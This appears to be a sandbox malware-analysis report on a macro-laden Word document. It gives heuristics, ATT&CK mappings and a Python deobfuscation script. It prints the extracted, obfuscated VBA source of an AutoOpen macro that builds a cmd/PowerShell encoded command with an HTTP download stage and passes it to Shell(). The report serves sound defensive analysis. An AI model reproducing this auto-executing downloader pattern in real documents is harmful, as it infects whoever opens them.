Verdict: MALICIOUS
Risk score: 202
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 User Execution: Malicious File
The sample is a Word document whose VBA project contains an AutoOpen subroutine, so the macro runs as soon as the document is opened with macros enabled. AutoOpen ends in a Shell() call, the decisive indicator: whatever string the macro has assembled is handed to the operating system to execute. That string is built at runtime from dozens of short literals spread across helper functions (tzXcs, HEzfTX, BqwHrujIzqN and others), each padded with no-op `Hour ...` and `Error ...` statements; `On Error Resume Next` keeps the never-assigned identifiers from raising, so they evaluate as Empty and drop out of the arithmetic and the concatenation. The readable fragments in the preview spell out a cmd.exe invocation (`mD  /V ... /r`, with the leading c expected from KeyString(... + vbKeyC + ...), Word's key-code-to-key-name function called with a sum that reduces to vbKeyC, 67) that sets an environment variable to a `powershe...` command taking a base64 `-e` argument. `JAB` at the start of that argument is the base64 encoding of a UTF-16LE `$`, and the UTF-16LE base64 spelling of `http://` (`aAB0AHQAcAA6AC8ALw`) appears further in, so a PowerShell download stage is the likely next step. The argument is interleaved with characters that cannot occur in base64 (#, $, ', comma, period, colon, semicolon), so the remainder of the command, which the preview truncates, must strip or substitute them before PowerShell can decode it. The exact payload therefore cannot be recovered from this preview alone, but the chain (Word macro, then cmd /V /r, then PowerShell -e, then an HTTP fetch) is clear.
Heuristics (6)
- ClamAV: Doc.Malware.Valyria-6691554-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6691554-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (This is the heuristic's generic description; for this sample a VBA project was in fact recovered, see the extracted macros.bas below.)
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the OOXML DrawingML namespace URI, present in any document that carries drawing markup; it is not a network indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13489 bytes | 135bcfa18c3dbdb5a05f045b2ca66407ebde2b31847fa3a641b11cbb439e292e |
Preview: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "LXkzdYWYjvWjR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Hour 3
Hour Round(39)
Error Fix(aRwrWj + iQhRaQ + HFwbCs + PiSWh)
Hour zfAwrn
Hour Tan(mEazCU - IYXYC)
Shell# KeyString(oGBqAIYAz + vfvoVFuvX + vbKeyC + MOXKjfVpwiqCtK + twjvibcTkm) + bqJTiqt + pYtfHchEc + tzXcs + HEzfTX + BqwHrujIzqN + mWznZT + NzNjUqAV + YijIcQDwZo + WCZwIG + XOjmivnSId + jOjJaGNj + DanQWwuO + zDvpNcrWHANO, 537545227 - 537545227
Hour TypeName(397)
Error Val(510520035)
End Sub
Attribute VB_Name = "UIhEzNLZzWDXzn"
Function tzXcs()
On Error Resume Next
Hour spczP
Hour Sin(ckWiC * ZbEoO - 66536 + 18834)
Hour CBool(43)
iWrbvZ = "mD " + " /V" + " " + " " + " " + " " + " " + " " + " /r" + " " + " " + " "
Hour Val(272489962)
Error Qurwi
Hour Sqr(AHqIOH)
WqnHsbKkqbj = " " + " " + CStr(Chr(wcUjLba + VoiJiFtJ + 34 + IwsfinzYACGEj + JIPziQJRqX)) + " " + " S" + "et " + "{ " + " =" + "pow" + "ers" + "he" + "X"
Hour cHAlL
Error 9
Error Sgn(99044 - nwWOV * 24664 * 74079)
YOmBapwmBUE = "X " + "-e " + "JAB" + "PA#" + "UA" + "$Q" + "A.A" + "G4" + "AZQ" + "B:" + "AC0" + "Abw" + "B'"
Hour kcLZI
Error CDate(24614 - KTsmwo * dXNLq / rkSPlm)
Hour Sgn(320)
pPPzQCATN = "AGo" + "A" + "ZQB" + "jA" + "H" + "QAI" + "AB," + "AG" + "UA" + "dAA" + ";A" + "F" + "c"
Hour Cos(956)
Hour Fix(kJDZBN)
SIiQjOZWTMJ = "A" + "ZQB" + "'" + "A#" + "MAb" + "ABp" + "A" + "GUA" + "b" + "g" + "B0A"
Hour 8
Hour HJAtij
Error huJHS
zkpSDzc = "D" + "sAJ" + "A" + "BUA" + "F" + "M" + "AU" + "QA" + ".AC"
Error CBool(hMpuMq)
Hour IRzdQ
Hour Sqr(41808074)
MjjGwFBA = "cA" + "aAB" + "0A" + "HQA" + "cAA" + "6AC" + "8" + "ALw" + "B;"
Error CCur(AkFtBZ)
Hour EiMdK
oElnpVbQ = "AGQ" + "A" + "c" + "AB2" + "AG" + "4A" + "L" + "g" + "Bj" + "AG" + "8Ab" + "QA" + "vA"
Hour 96
Hour Atn(YXaniS * OfTKf - 69763 * DOjAOw)
Error 4
lAFQiuiHTs = "#oA" + "e" + "Q" + "A" + ":" + "A#" + "MAW" + "AB" + "BA"
tzXcs = iWrbvZ + WqnHsbKkqbj + YOmBapwmBUE + pPPzQCATN + SIiQjOZWTMJ + zkpSDzc + MjjGwFBA + oElnpVbQ + lAFQiuiHTs
Error CCur(151)
Hour Atn(ULzLi)
Hour Tan(46665 / JGzldu / XpnnHu + AtIvq)
End Function
Function HEzfTX()
On Error Resume Next
Error klrmpw
Hour UTAUnk
Hour TypeName(wOzmib)
itIjDiNb = "FM" + "A" + "Q" + "AB" + "o" + "A"
Error zqYHH
Error 32
Error CDate(EmlnSP)
TVwiAib = "H" + "QA" + "d" + "ABw" + "AD"
Error Muvoa
Hour Atn(68863 + RWDZsG + 41092 * MjbwNZ)
Hour CBool(LFcEP * RBqLo)
KibwjqKBED = "o" + "AL" + "wAv" + "AH" + "AA" + "3Q"
Error Str(77806 - TlcDz)
Error Month(94)
CHwkaQ = "ByA" + "GQA" + "ZQB" + "mAG" + "kAe" + "AA" + ";A" + "GMA"
Hour 48051432
Hour 2455
Hour 30
junjzwS = "b" + "w" + "B\A" + "C8A" + "cAB" + "2A" + "HUA" + "T"
Error XRwNif
Hour Atn(jocti)
qoYOh = "A" + "BLA" + "#sA" + "QA" + "BoA" + "H" + "QAd" + "ABw" + "ADo" + "AL" + "w" + "AvA"
Error Tan(96)
Error Fix(ECAbr)
Hour Hex(74671 + TvlbQL)
DZwFAVHvbE = "G" + "IA" + "ZQ" + "B'A" + "GI" + "Ab" + "wB;" + "A" + "Gw" + "AaQ" + "B;"
HEzfTX = itIjDiNb + TVwiAib + KibwjqKBED + CHwkaQ + junjzwS + qoYOh + DZwFAVHvbE
Error sHkfj
Error RwXXz
End Function
Function BqwHrujIzqN()
On Error Resume Next
Hour Rnd(101742117)
Error rzsXb
HZisPA = "AGU" + "ALg" + "Bj" + "A" + "G" + "8A" + "LgB"
Error CDate(DPUcW)
Error CStr(130482207)
GWduSbE = "^%" + "AG" + "sAL" + "w" + "B"
Hour Hex(MTmGHA)
Error CDec(Uisnsv)
kNujjUAbZz = "T" + "AF" + "#" + "A/Q" + "Bv" + "AGw" + "ANQ" + "BAA"
Hour CStr(ktjVsk)
Hour TypeName(9)
omOhRipww = "Gg" + "Ad" + "AB" + "0A" + "HAA" + ",gA" + "v" + "A" + "C" + "8A" + "bAB" + "vAG"
Error iluGS
Hour 90
VRmqW = "4A" + "Z" + "A" + "BvA" + "G" + "4" + "AdA"
Hour Sqr(qtkzb)
Error cfdLU
YjBMtzY = "Bp" + "A" + "G0A" + "ZQB" + "0" +
... (truncated)
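The following Python script is an added worked example, not part of the analyzer's report and not the sample's own code. It statically resolves the string-building pattern seen in tzXcs() above: it evaluates the `"lit" + "lit" + CStr(Chr(n))` concatenations, skips the Hour/Error padding statements, treats identifiers the macro never assigns as VBA Empty (0 inside Chr() arithmetic, "" in concatenation, an assumption that matches VBA semantics), and then inspects the reconstructed `-e` argument: which characters fall outside the base64 alphabet, whether the UTF-16LE base64 spelling of `http://` is present at any of its three byte alignments, and what the clean leading run decodes to. The embedded input is the tzXcs() function from the preview with all but one of the padding statements dropped; every helper name below is this example's own.

```python
import base64
import re

# Input for this example: the string-building lines of tzXcs() from the macros.bas
# preview above, with all but one of the Hour/Error padding statements dropped.
TZXCS_SRC = r'''
Function tzXcs()
On Error Resume Next
Hour Sin(ckWiC * ZbEoO - 66536 + 18834)
iWrbvZ = "mD " + " /V" + " " + " " + " " + " " + " " + " " + " /r" + " " + " " + " "
WqnHsbKkqbj = " " + " " + CStr(Chr(wcUjLba + VoiJiFtJ + 34 + IwsfinzYACGEj + JIPziQJRqX)) + " " + " S" + "et " + "{ " + " =" + "pow" + "ers" + "he" + "X"
YOmBapwmBUE = "X " + "-e " + "JAB" + "PA#" + "UA" + "$Q" + "A.A" + "G4" + "AZQ" + "B:" + "AC0" + "Abw" + "B'"
pPPzQCATN = "AGo" + "A" + "ZQB" + "jA" + "H" + "QAI" + "AB," + "AG" + "UA" + "dAA" + ";A" + "F" + "c"
SIiQjOZWTMJ = "A" + "ZQB" + "'" + "A#" + "MAb" + "ABp" + "A" + "GUA" + "b" + "g" + "B0A"
zkpSDzc = "D" + "sAJ" + "A" + "BUA" + "F" + "M" + "AU" + "QA" + ".AC"
MjjGwFBA = "cA" + "aAB" + "0A" + "HQA" + "cAA" + "6AC" + "8" + "ALw" + "B;"
oElnpVbQ = "AGQ" + "A" + "c" + "AB2" + "AG" + "4A" + "L" + "g" + "Bj" + "AG" + "8Ab" + "QA" + "vA"
lAFQiuiHTs = "#oA" + "e" + "Q" + "A" + ":" + "A#" + "MAW" + "AB" + "BA"
tzXcs = iWrbvZ + WqnHsbKkqbj + YOmBapwmBUE + pPPzQCATN + SIiQjOZWTMJ + zkpSDzc + MjjGwFBA + oElnpVbQ + lAFQiuiHTs
End Function
'''

STR_LIT = re.compile(r'"((?:[^"]|"")*)"')
ASSIGN = re.compile(r'^([A-Za-z_]\w*)\s*=\s*(.+)$')
CHR_CALL = re.compile(r'(?:CStr\()?\s*Chr\((.*?)\)\)?', re.I)
SKIP = re.compile(r'^(?:Hour|Error|On Error|Function|End Function)\b', re.I)  # padding and structure
B64_CHARS = set('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=')

def split_plus(expr):
    """Split a VBA expression on '+' operators that sit outside quotes and parentheses."""
    parts, cur, depth, in_str = [], [], 0, False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        elif not in_str and ch in '()':
            depth += 1 if ch == '(' else -1
        elif not in_str and ch == '+' and depth == 0:
            parts.append(''.join(cur).strip())
            cur = []
            continue
        cur.append(ch)
    parts.append(''.join(cur).strip())
    return parts

def eval_term(term, env):
    """One operand: literal, Chr(sum of numeric terms), or a variable. Never-assigned
    identifiers are VBA Empty: 0 inside Chr() arithmetic, "" when concatenated (assumed
    VBA semantics; On Error Resume Next in the macro masks anything else)."""
    m = STR_LIT.fullmatch(term)
    if m:
        return m.group(1).replace('""', '"')
    m = CHR_CALL.fullmatch(term)
    if m:
        return chr(sum(int(n) for n in re.findall(r'\b\d+\b', m.group(1))))
    return env.get(term, '') if re.fullmatch(r'[A-Za-z_]\w*', term) else ''

def resolve_strings(vba_src):
    """Final value of every string variable. A VBA function returns whatever was assigned
    to its own name, so env['tzXcs'] is the piece that reaches Shell() from this helper."""
    env = {}
    for line in (l.strip() for l in vba_src.splitlines()):
        m = ASSIGN.match(line)
        if line and not SKIP.match(line) and m:
            env[m.group(1)] = ''.join(eval_term(t, env) for t in split_plus(m.group(2)))
    return env

def encoded_arg(cmdline):
    """The token after PowerShell's -e (EncodedCommand) switch."""
    m = re.search(r'-e\s+(\S+)', cmdline)
    return m.group(1) if m else ''

def foreign_chars(blob):
    """Characters no base64 string can contain: filler the truncated cmd tail must
    strip or substitute before PowerShell can decode -e."""
    return sorted({c for c in blob if c not in B64_CHARS})

def utf16le_b64_variants(keyword):
    """The three base64 spellings of a UTF-16LE keyword, one per byte alignment, trimmed
    to the characters whose bits do not depend on the unknown neighbouring bytes."""
    raw, out = keyword.encode('utf-16-le'), []
    for k in range(3):
        data = b'\x00' * k + raw
        enc = base64.b64encode(data).decode().rstrip('=')
        tail = 0 if len(data) % 3 == 0 else 1  # last char shares bits with the next byte
        out.append(enc[(0, 2, 3)[k]:len(enc) - tail])  # leading chars tainted by the k pad bytes
    return out

def find_keyword(text, keyword):
    """Alignment variants of keyword (UTF-16LE, base64) that occur in text."""
    return [v for v in utf16le_b64_variants(keyword) if v in text]

def decode_leading_prefix(blob):
    """Decode the clean base64 run at the start of the blob as UTF-16LE."""
    run = re.match(r'[A-Za-z0-9+/]*', blob).group(0)
    run = run[:len(run) - (len(run) % 4 == 1)]  # no valid base64 is 1 char past a 4-boundary
    raw = base64.b64decode(run + '=' * (-len(run) % 4))
    return raw[:len(raw) // 2 * 2].decode('utf-16-le')

if __name__ == '__main__':
    cmd = resolve_strings(TZXCS_SRC)['tzXcs']
    blob = encoded_arg(cmd)
    print('reconstructed fragment:', cmd)
    print('filler outside the base64 alphabet:', foreign_chars(blob))
    print('UTF-16LE "http://" spellings present:', find_keyword(cmd, 'http://'))
    print('clean prefix decodes to:', decode_leading_prefix(blob))
```

Run as a script it prints the reconstructed `cmD ... /V ... /r " Set ... =powershe.. -e JAB...` fragment (the leading c comes from KeyString() in AutoOpen, outside this helper), the seven filler characters, the aligned `http://` hit, and `$` for the clean prefix. The keyword search works on the raw blob precisely because it only needs the base64 characters that are fully determined by the keyword's own bytes; it does not need the filler removed. What it cannot do is recover the substitution the cmd tail performs, so it stops at reporting which characters break the encoding rather than guessing a mapping.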